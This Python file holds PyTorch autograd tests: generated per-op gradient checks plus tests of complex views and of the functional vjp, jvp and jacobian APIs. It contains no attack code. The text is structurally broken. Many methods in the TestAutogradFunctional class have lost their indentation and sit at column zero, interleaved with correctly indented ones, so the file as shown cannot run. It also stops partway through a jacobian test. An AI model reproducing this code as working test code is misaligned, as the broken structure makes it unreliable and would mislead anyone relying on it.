def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
                          f_args_variable, f_args_tensor):
    """Run gradient checks for the functional form of an op, and verify that
    backward() populates a grad of matching type string and size on the first
    input."""
    output_variable = apply_fn(*f_args_variable)
    if run_grad_checks:
        run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
                                     output_variable, f_args_variable)
    first_input = f_args_variable[0]
    backward_applicable = (isinstance(output_variable, torch.Tensor)
                           and output_variable.requires_grad
                           and first_input is not None)
    if backward_applicable:
        output_variable.backward(randn_like(output_variable))
        test_case.assertEqualTypeString(first_input, first_input.grad)
        test_case.assertEqual(first_input.size(), first_input.grad.size())
# this list corresponds to ops which have separate tests defined for complex dtypes in
# common_methods_invocations.py
# test for these ops with 'complex' in variant should only run for complex and
# the tests for these ops which do not have 'complex' in variant should not run for complex
# and only run for floating point
separate_complex_tests = ['div', '__rdiv__', 'sub']
# allow list for complex
# (method tests for these ops are additionally generated with a complex dtype
# by add_test below)
complex_list = ['t', 'view', 'reshape', 'reshape_as', 'view_as', 'roll', 'clone',
                'expand', 'rot90', 'transpose',
                'permute', 'squeeze', 'unsqueeze', 'resize', 'resize_as', 'tril', 'triu',
                'chunk', 'split', 'split_with_sizes', 'zero_',
                '__radd__', 'mul', '__rmul__', 'diagonal', 'fill_', 'sub', 'narrow',
                'swapaxes', 'swapdims', 'tensor_split'] + separate_complex_tests
# deny list for batched grad computation
EXCLUDE_BATCHED_GRAD_TESTS = set([
    'test_to_sparse',
])
def add_test(
        name,
        self_size,
        args,
        variant_name='',
        check_ad=(),  # only used in test_jit
        dim_args_idx=(),
        skipTestIf=(),
        output_process_fn=lambda x: x,
        kwargs=None):
    # Generates one TestAutogradDeviceType test per (dtype, dim-sign
    # permutation) for the method `name`: compares the method result on a
    # requires-grad input against a plain copy, runs grad/gradgrad checks,
    # exercises the functional interface, and compares out-of-place vs
    # in-place gradients.
    kwargs = kwargs if kwargs else {}
    basic_test_name = 'test_' + name
    if variant_name != '':
        basic_test_name += '_' + variant_name
    if name in separate_complex_tests and 'complex' in variant_name:
        run_only_complex = True
    else:
        run_only_complex = False
    for dtype in [torch.double, torch.cdouble]:
        # Each dim_perm entry flips the sign of one dim argument so that
        # negative-dim handling is covered too.
        for dim_perm in product([-1, 1], repeat=len(dim_args_idx)):
            test_name = basic_test_name
            new_args = [arg * dim_perm[dim_args_idx.index(i)] if i in dim_args_idx else arg for i, arg in enumerate(args)]
            test_name = basic_test_name + ''.join('_neg' + str(i) for i, idx in enumerate(dim_perm) if idx < 0)
            if dtype.is_complex:
                # TODO: remove this. this is temporary while we ramp up the complex support.
                if name in complex_list:
                    if name in separate_complex_tests and 'complex' not in variant_name:
                        continue
                    if not run_only_complex:
                        test_name = test_name + '_complex'
                else:
                    continue
            elif run_only_complex:
                continue
            new_args = tuple(new_args)
            # for-loop bodies don't define scopes, so we have to save the variables
            # we want to close over in some way
            def do_test(self, device, dtype=dtype, name=name, self_size=self_size, args=new_args, test_name=test_name,
                        output_process_fn=output_process_fn):
                def check(name):
                    is_magic_method = name[:2] == '__' and name[-2:] == '__'
                    is_inplace = name[-1] == "_" and not is_magic_method
                    self_variable = create_input((self_size,), dtype=dtype, device=device)[0][0]
                    # FixMe: run grad checks on inplace self
                    if is_inplace:
                        self_variable.requires_grad = False
                    # need to record this because methods can change the size (e.g. unsqueeze)
                    args_variable, kwargs_variable = create_input(args, requires_grad=not is_inplace,
                                                                  call_kwargs=kwargs, dtype=dtype, device=device)
                    self_tensor = deepcopy(self_variable)
                    args_tensor = deepcopy(unpack_variables(args_variable))
                    if not exclude_tensor_method(name, test_name):
                        # Method call on a requires-grad input vs. on a plain
                        # copy must produce the same values.
                        output_variable = getattr(self_variable, name)(*args_variable, **kwargs_variable)
                        output_tensor = getattr(self_tensor, name)(*args_tensor, **kwargs_variable)
                        if not isinstance(output_tensor, torch.Tensor) and not isinstance(output_tensor, tuple):
                            # Python-number result: wrap it for comparison.
                            if dtype.is_complex:
                                output_tensor = torch.tensor((output_tensor, ), dtype=torch.cfloat, device=device)
                            else:
                                output_tensor = torch.tensor((output_tensor, ), dtype=torch.float, device=device)
                        self.assertEqual(unpack_variables(output_variable), output_tensor)
                        # TODO: check that both have changed after adding all inplace ops
                        def fn(*inputs):
                            output = getattr(inputs[0], name)(*inputs[1:], **kwargs)
                            return output_process_fn(output)
                        if not is_inplace and name not in EXCLUDE_GRADCHECK:
                            check_batched_grad = test_name not in EXCLUDE_BATCHED_GRAD_TESTS
                            run_grad_and_gradgrad_checks(self, name, test_name, fn,
                                                         output_variable, (self_variable,) + args_variable,
                                                         check_batched_grad=check_batched_grad)
                    # functional interface tests
                    torch_fn = getattr_qualified(torch, name)
                    if torch_fn is not None and name not in EXCLUDE_FUNCTIONAL:
                        def fn(*inputs):
                            output = torch_fn(*inputs, **kwargs)
                            return output_process_fn(output)
                        f_args_variable = (self_variable,) + args_variable
                        f_args_tensor = (self_tensor,) + args_tensor
                        # could run the gradchecks again, but skip since we did it for the methods above.
                        run_gradcheck = exclude_tensor_method(name, test_name) and not is_inplace and name not in EXCLUDE_GRADCHECK
                        run_functional_checks(self, test_name, name, fn,
                                              run_gradcheck, f_args_variable, f_args_tensor)
                    # check for correct type of input and input.grad
                    if not is_inplace:
                        self_variable = create_input((self_size,), requires_grad=True, dtype=dtype)[0][0]
                        args_variable, kwargs_variable = create_input(args, requires_grad=False, call_kwargs=kwargs, dtype=dtype)
                        if hasattr(self_variable, name):
                            attribute_result = getattr(self_variable, name)
                            if callable(attribute_result):
                                output_variable = attribute_result(*args_variable, **kwargs_variable)
                            else:
                                # Property-style attribute: must take no args.
                                self.assertTrue(len(args_variable) == 0)
                                self.assertTrue(len(kwargs_variable) == 0)
                                output_variable = attribute_result
                        else:
                            self_and_args_variable = (self_variable,) + args_variable
                            output_variable = torch_fn(*self_and_args_variable, **kwargs_variable)
                        if isinstance(output_variable, torch.autograd.Variable):
                            if output_variable.is_sparse:
                                rand = randn_like(output_variable.to_dense()).to_sparse()
                            else:
                                rand = randn_like(output_variable)
                            output_variable.backward(rand)
                            self.assertTrue(type(self_variable) == type(self_variable.grad))
                            self.assertTrue(self_variable.size() == self_variable.grad.size())
                        # compare grads to inplace grads
                        inplace_name = name + '_'
                        # can't broadcast inplace to left hand side
                        skip_inplace = ('broadcast_lhs' in test_name or
                                        'broadcast_all' in test_name)
                        if hasattr(torch.ones(1), inplace_name) and not skip_inplace:
                            output_variable = getattr(self_variable, name)(*args_variable, **kwargs_variable)
                            if not isinstance(output_variable, tuple):
                                output_variable = (output_variable,)
                            inplace_self_variable = deepcopy(self_variable)
                            inplace_self_variable_copy = tuple(i.clone() if isinstance(i, torch.Tensor) else i
                                                               for i in (inplace_self_variable,))
                            inplace_args_variable = deepcopy(args_variable)
                            inplace_args_variable_copy = tuple(i.clone() if isinstance(i, torch.Tensor) else i
                                                               for i in inplace_args_variable)
                            inplace_output_variable = (
                                getattr(inplace_self_variable_copy[0], inplace_name)(*inplace_args_variable_copy,
                                                                                     **kwargs_variable))
                            if not isinstance(inplace_output_variable, tuple):
                                inplace_output_variable = (inplace_output_variable,)
                            self.assertEqual(inplace_output_variable, output_variable)
                            # Check that gradient is the same
                            # (zero any stale grads first so backward starts clean)
                            for inp_i, i in zip((inplace_self_variable,) + inplace_args_variable,
                                                (self_variable,) + args_variable):
                                if not isinstance(inp_i, torch.Tensor):
                                    assert not isinstance(i, torch.Tensor)
                                    continue
                                if inp_i.grad is not None:
                                    with torch.no_grad():
                                        inp_i.grad.zero_()
                                if i.grad is not None:
                                    with torch.no_grad():
                                        i.grad.zero_()
                            for i_o, o in zip(inplace_output_variable, output_variable):
                                if dtype.is_complex:
                                    grad = randn_like(i_o).to(torch.cdouble)
                                else:
                                    grad = randn_like(i_o).double()
                                i_o.backward(grad)
                                o.backward(grad)
                            for inp_i, i in zip((inplace_self_variable,) + inplace_args_variable,
                                                (self_variable,) + args_variable):
                                if not isinstance(inp_i, torch.Tensor):
                                    continue
                                self.assertEqual(inp_i.grad, i.grad)
                check(name)
                inplace_name = name + '_'
                # can't broadcast inplace to left hand side
                broadcast_skip_inplace = 'broadcast_lhs' in test_name or 'broadcast_all' in test_name
                if hasattr(torch.ones(1), inplace_name) and not broadcast_skip_inplace:
                    check(inplace_name)
            assert not hasattr(TestAutograd, test_name), 'Two tests have the same name: ' + test_name
            for skip in skipTestIf:
                do_test = skip(do_test)
            setattr(TestAutogradDeviceType, test_name, do_test)
class TestAutogradComplex(TestCase):
    """Autograd behavior specific to complex views (view_as_complex /
    view_as_real)."""

    def test_view_func_for_complex_views(self):
        """In-place ops through chains of complex views must produce the same
        gradient as the equivalent non-view computation."""
        # case 1: both parent and child have view_func
        x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
        y = x.detach().requires_grad_(True)
        x0 = x.clone()
        x1 = torch.view_as_complex(x0)
        x2 = torch.view_as_real(x1)
        x2.mul_(2)
        x2.sum().backward()
        y0 = y.clone()
        y0.mul_(2)
        y0.sum().backward()
        self.assertEqual(x.grad, y.grad)
        # case 2: parent has view_func but child does not
        x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
        y = x.detach().requires_grad_(True)

        def fn(a):
            b = a.clone()
            b1 = torch.view_as_complex(b)
            b2 = b1.reshape(b1.numel())
            return b2
        x0 = fn(x)
        x0.mul_(2)
        x0.sum().backward()
        y0 = fn(y)
        y1 = y0.mul(2)
        y1.sum().backward()
        self.assertEqual(x.grad, y.grad)
        # case 3: parent does not have a view_func but child does
        x = torch.randn(10, dtype=torch.cdouble, requires_grad=True)
        y = x.detach().requires_grad_(True)

        def fn(a, dim0_size=5):
            b = a.clone()
            b1 = b.reshape(dim0_size, 2)
            b2 = torch.view_as_real(b1)
            return b2
        x0 = fn(x)
        x0.mul_(2)
        x0.sum().backward()
        y0 = fn(y)
        y1 = y0.mul(2)
        y1.sum().backward()
        self.assertEqual(x.grad, y.grad)

    def test_view_with_multi_output(self):
        """In-place modification of one output of a multi-output view must be
        rejected, with or without requires_grad on the base."""
        x = torch.randn(2, 2, 2, dtype=torch.double)
        x1 = torch.view_as_complex(x)
        # Taking an invalid view should always be allowed as long as it is not
        # modified inplace
        res = x1.unbind(0)
        with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
            res[0] += torch.rand(2, requires_grad=True)
        x.requires_grad_(True)
        x1 = torch.view_as_complex(x)
        # Taking an invalid view should always be allowed as long as it is not
        # modified inplace
        res = x1.unbind(0)
        with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
            res[0] += torch.rand(2, requires_grad=True)

    def test_as_identity(self):
        """view_as_real and view_as_complex should behave like an identity for
        autograd purposes."""
        def func(z):
            z_ = torch.view_as_complex(z)
            z_select = torch.select(z_, z_.dim() - 1, 0)
            z_select_real = torch.view_as_real(z_select)
            return z_select_real.sum()

        z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True)
        gradcheck(func, [z])
        func(z).backward()

        z1 = z.clone().detach().requires_grad_(True)
        torch.select(z1, z1.dim() - 2, 0).sum().backward()
        self.assertEqual(z.grad, z1.grad)

    # Bug fix (backward-compatible alias): this method was previously named
    # ``as_identity`` — without the ``test_`` prefix unittest discovery
    # silently never ran it.
    as_identity = test_as_identity
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
    def test_vjp_err_check(self):
        """vjp input validation: non-Tensor inputs, non-Tensor outputs,
        missing v for a non-scalar output, wrong v structure and wrong v
        size."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3)
        def bar(a):
            # Returns a non-Tensor second output, which vjp must reject.
            return 3 * a.narrow(0, 0, 3), "bar"
        inp = torch.rand(4)
        v = torch.ones(3)
        with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
            res = autogradF.vjp(foo, (inp, 2), v)
        with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
            res = autogradF.vjp(bar, inp, v)
        with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
            res = autogradF.vjp(foo, inp)
        with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
            res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
        with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
            res = autogradF.vjp(foo, inp, v[:2])
        # A well-formed call succeeds and the grad matches the input layout.
        res = autogradF.vjp(foo, inp, v)[1]
        self._assert_same_struct(res, inp)
    def test_vjp_err_check_strict(self):
        """strict=True turns gradient-independence situations into errors;
        strict=False returns zero (or pass-through) gradients instead."""
        def foo(a):
            return a.detach()
        def bar(a):
            # Make a non-leaf Tensor that requires_grad but that is not connected to the input
            return a.long().float().requires_grad_().clone()
        inp = torch.rand(4)
        v = torch.rand(4)
        with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
            res = autogradF.vjp(foo, inp, v, strict=True)
        # Non-strict: a zero gradient with the input's structure is returned.
        res = autogradF.vjp(foo, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
            res = autogradF.vjp(bar, inp, v, strict=True)
        res = autogradF.vjp(bar, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
        # The Jacobian does not depend on the input
        def foo(a):
            return a.clone()
        inp.requires_grad_()
        with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
            res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
        # Non-strict: identity function, so the vjp is just v.
        res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
    def test_jvp_err_check(self):
        """jvp input validation: non-Tensor inputs, non-Tensor outputs,
        missing v for a non-scalar input, wrong v structure and wrong v
        size."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3)
        def bar(a):
            # Returns a non-Tensor second output, which jvp must reject.
            return 3 * a.narrow(0, 0, 3), "bar"
        inp = torch.rand(4)
        v = torch.rand(4)
        with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
            res = autogradF.jvp(foo, (inp, 2), v)
        with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
            res = autogradF.jvp(bar, inp, v)
        with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
            res = autogradF.jvp(foo, inp)
        with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
            res = autogradF.jvp(foo, inp, (v, v))
        with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
            res = autogradF.jvp(foo, inp, v[:2])
        # A well-formed call succeeds and the jvp matches the output layout.
        res = autogradF.jvp(foo, inp, v)[1]
        self._assert_same_struct(res, foo(inp))
    def test_jvp_err_check_strict(self):
        """strict=True turns gradient-independence situations into errors;
        strict=False returns zero (or pass-through) results instead."""
        def foo(a):
            return a.detach()
        def bar(a):
            # Make a non-leaf Tensor that requires_grad but that is not connected to the input
            return a.long().float().requires_grad_().clone()
        inp = torch.rand(4)
        v = torch.rand(4)
        with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
            res = autogradF.jvp(foo, inp, v, strict=True)
        # Non-strict: a zero jvp with the output's structure is returned.
        res = autogradF.jvp(foo, inp, v, strict=False)
        self._assert_same_struct(res[1], res[0])
        self.assertEqual(res[1].abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
            res = autogradF.jvp(bar, inp, v, strict=True)
        res = autogradF.jvp(bar, inp, v, strict=False)
        self._assert_same_struct(res[1], res[0])
        self.assertEqual(res[1].abs().sum(), 0.)
        # The Jacobian does not depend on the input
        def foo(a):
            return a.clone()
        inp.requires_grad_()
        with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
            res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
        # Non-strict: identity function, so the jvp is just v.
        res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
    @unittest.skipIf(not TEST_CUDA, "test requires CUDA")
    def test_construct_standard_basis_for_cuda(self):
        """Mixed cpu/cuda inputs: each basis piece must land on its own
        input's device."""
        test_cases = [
            (torch.randn(2), torch.randn(3, device='cuda')),
            (torch.randn(3, device='cuda'), torch.randn(2)),
        ]
        for inputs in test_cases:
            self._test_construct_standard_basis_for(inputs)
    def _test_vectorize_raises_no_warnings(self, api):
        """Assert that `api(..., vectorize=True)` emits no warnings at all.

        vmap is an experimental prototype: calling torch.vmap raises a python
        warning.  autogradF.{jacobian, hessian} use vmap when vectorize=True
        and must not leak that experimental-prototype warning to callers.
        """
        def foo(a):
            return (a ** 2).sum()
        x = torch.randn(3)
        with warnings.catch_warnings(record=True) as wa:
            result = api(foo, x, vectorize=True)
        self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
    def _test_jacobian_err_check(self, vectorize):
        """Check jacobian's error messages for bad inputs/outputs, then its
        normal operation for single- and multi-input functions."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3)
        def bar(a):
            # A non-Tensor second output must be rejected.
            return 3 * a.narrow(0, 0, 3), "bar"
        inp = torch.rand(4)
        with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
            res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
        with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
            res = autogradF.jacobian(bar, inp, vectorize=vectorize)
        res = autogradF.jacobian(foo, inp, vectorize=vectorize)
        self._assert_interleaved_struct(res, foo(inp), inp)
        def foo(a, b):
            return b, 3 * a.narrow(0, 0, 3)
        inp = (torch.rand(4), torch.rand(5))
        res = autogradF.jacobian(foo, inp, vectorize=vectorize)
        self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
